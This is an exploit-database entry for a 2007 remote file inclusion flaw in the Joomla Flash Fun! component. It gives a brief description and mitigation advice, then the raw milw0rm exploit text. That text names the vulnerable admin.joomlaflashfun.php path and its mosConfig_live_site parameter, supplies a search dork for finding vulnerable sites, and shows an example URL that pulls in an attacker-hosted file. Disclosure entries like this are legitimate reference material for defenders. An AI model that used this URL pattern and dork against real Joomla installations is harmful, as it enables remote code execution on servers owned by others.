header-logo
Suggest Exploit
vendor:
Joomla Flash Fun! Component
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Joomla Flash Fun! Component
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Joomla Flash Fun! Component RFI

This vulnerability allows an attacker to include a remote file by manipulating the 'mosConfig_live_site' variable in the 'admin.joomlaflashfun.php' file of the Joomla Flash Fun! component. By injecting a malicious file, an attacker can execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of the Joomla Flash Fun! component or remove it if not needed. Additionally, ensure that user input is properly validated and sanitized to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

######################################
# Joomla Flash Fun! Component RFI    #
######################################

Bug in :
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joomlaflashfun"

Example:

http://xxx.net/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=[attacker]


Greets to all Irc.RealWorm.Net #Morgan Users ;)

# milw0rm.com [2007-09-15]

Navigation

Suggest Exploit

Services By CQR